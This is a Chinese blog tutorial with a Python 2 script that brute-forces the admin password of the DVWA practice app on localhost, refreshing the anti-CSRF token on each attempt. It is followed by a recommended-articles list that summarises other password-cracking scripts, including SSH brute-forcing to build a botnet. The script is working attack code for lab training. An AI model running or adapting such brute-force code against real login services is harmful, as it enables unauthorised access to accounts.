python之——使用python编写爆破脚本

最新推荐文章于 2024-03-18 17:06:41 发布
最新推荐文章于 2024-03-18 17:06:41 发布
阅读量3k 收藏 21
点赞数 7
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/105531530
版权

此处以dvwa网站的密码爆破为例

#coding:utf-8
"""
dvwa高级爆破 
需要用户名  密码 token cookie
每次通过账号密码访问之前,需要获取token
"""
import urllib2
from bs4 import BeautifulSoup
def getToken():
    """提取token"""
    url="http://localhost/DVWA-master/vulnerabilities/brute/"
    req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
    response=urllib2.urlopen(req)
    html=response.read()
    soup=BeautifulSoup(html,"html.parser")
    token=soup.find("input",attrs={"name":"user_token"})
    return token.get("value")
f=open("zidian","r")
while 1:
    line=f.readline().strip()
    if line==None or len(line)==0:
        break
    password=line
    token=getToken()
    url="http://localhost/DVWA-master/vulnerabilities/brute/?username=admin&password=%s&Login=Login&user_token=%s#"%(line,token)
    req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
    response=urllib2.urlopen(req)
    html=response.read()
    if "Welcome to the password" in html:
        print "爆破成功,密码是",password
        break

效果:

卖N孩的X火柴
关注
  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python多线程对RAR文件密码爆破_pythonunrar(1),字节跳动架构师讲解网络安全开发
m0_61072747的博客
04-06 992
该函数将遍历密码字典中的每个密码,并尝试解压RAR文件。如果找到正确的密码,将打印破解成功消息,并将全局变量。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~创建一个文本文件,每行包含一个密码,作为密码字典。,它将创建一个线程池,并将密码字典分配给不同的线程进行处理。在主程序中,我们指定RAR文件的路径和密码字典的路径,并调用。print(“破解成功,密码是:” + pas)print(“破解成功,密码是:” + pas)
Python实现压缩包密码暴力破解脚本(附代码)
winkexin的博客
06-26 5688
print("破解成功,密码是:" + pas)print("破解成功,密码是:" + pas)print("破解成功,密码是" + pas)print(f"检测到字典里有{len(ozd)}个密码")print("破解失败")print("检测到是zip压缩包")print("检测到是rar压缩包")print("正在破解.....")print("正在破解.....")print("检测到是7z压缩包")print("正在破解.....")print("破解失败")print("破解失败")
【针对DVWA登录界面密码的暴力破解python脚本(保持会话,携带token)】
AA8j的博客
09-09 897
效果 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/3 13:01 # @Author : AA8j # @Site : # @File : test2.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import re import requests from fake_useragent import Use
python脚本7-爆破woniusales
m0_61786761的博客
09-21 296
【代码】python脚本7-爆破woniusales。
Python安全脚本之密码爆破脚本编写
weixin_60830484的博客
03-18 537
本文讲解了简单的密码爆破脚本编写以及对应的优化思路
Python 开发-多线程爆破
xhscxj的博客
06-05 666
1.ftplib 模块使用 2.遍历用户及密码字典 3.尝试连接执行命令判断 异或一句话免杀php
Python脚本,网站暴力破解攻击
weixin_44297276的博客
03-28 1971
rv:78.0) Gecko/20100101 Firefox/78.0" # 用户代理。wordlist = "D:\Meu jogos Meus documentos\ProgetoNovo\small.txt" # 字典文件路径。target = input("\nInsira URL:") # 目标URL。# 当单词队列不为空时,获取队列中的单词。# 如果有恢复点,则从恢复点开始。# 遍历字典文件中的每个单词。# 定义函数:读取字典文件。
python制作企业邮箱的爆破脚本
12-23
按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破脚本。 我先说下整体思路: 总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,...
Python编写固定字典爆破
最新发布
05-19
"使用方法.png"可能是展示如何运行这个爆破脚本的示意图。 值得注意的是,虽然这种技术在安全测试中具有实际应用,但它也可能会被滥用。因此,确保在合法授权和合适的环境下进行此类操作至关重要,否则可能触犯法律...
根据指定hash值寻键爆破脚本Python实现)
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
python脚本爆破shell
06-14
python脚本爆破shell
Python版Mssql爆破脚本
09-09
本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下
zip密码爆破脚本-----python3
f1gure的博客
05-07 1486
import zipfile from threading import Thread def extractFile(filename, password): try: filename.extractall(pwd=password.encode('utf-8')) print("密码找到,是:"+password) except: ...
Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
谢公子的博客
11-03 3932
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 login()、logout() 和 prompt() 等函数直接与SSH进行交互 。对于login()函数,如果执行成功则不会抛出异常,将显示消息表示密码已经找到并把表示密码已找到...
python爆破示例_用python爆破某会员网站
weixin_33335559的博客
01-12 631
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
通过python脚本简单爆破web页面登陆
p_utao的博客
01-27 976
GET传参 import requests url = "" payload = {'username':'admin','password':'admin','submit':'登陆'} r = requests.get(url,params=payload) result = r.content if str(result).find('成功'): print("admin:admin") POST传参 import requests url = "" data = {'username
使用Python脚本学习DVWA-Brute Force(爆破
weixin_43838889的博客
04-22 1302
使用Python脚本学习DVWABrute Force(爆破)LowPython 脚本密码字典文件执行结果修改后脚本:执行结果 Brute Force(爆破) 本文全程参考[https://blog.csdn.net/zy15667076526/article/details/109705286?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0]向该博主致谢(https://blog.csdn.net/zy
python--程序】telnet密码暴力破解
qq_43017750的博客
10-17 3066
前言 最近博主单位的网络出现了故障,想要登陆到交换机中发现有密码。然而密码没有人知道,这可真难为人!博主第一时间想到的是hydra暴力破解工具,然而发现不支持密码验证的telnet。在获取领导的授权下,博主使用socket编写一款telnet密码爆破工具。警告:该程序仅供学习telnet协议工作原理,禁止用于违法行为。 环境分析 交换机的管理地址是:192.168.133.130 博主使用的地址是...
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web Application)的安全漏洞,例如密码爆破和SQL注入。对于密码爆破,可以使用Python脚本来尝试不同的密码组合,直到找到正确的密码。对于SQL注入,Python脚本可以通过构造特定的SQL查询语句来绕过应用程序的验证,进而获取未经授权的访问权限。 在DVWA密码爆破的例子中,根据提供的引用,通过修改Python脚本的密码字典文件和执行结果,可以针对不同的安全等级(Low、Medium、High、Impossible)进行密码爆破。 在DVWA SQL注入的例子中,根据提供的引用,通过修改Python脚本中的SQL查询语句,可以针对不同的安全等级(Low、Medium、High、Impossible)进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值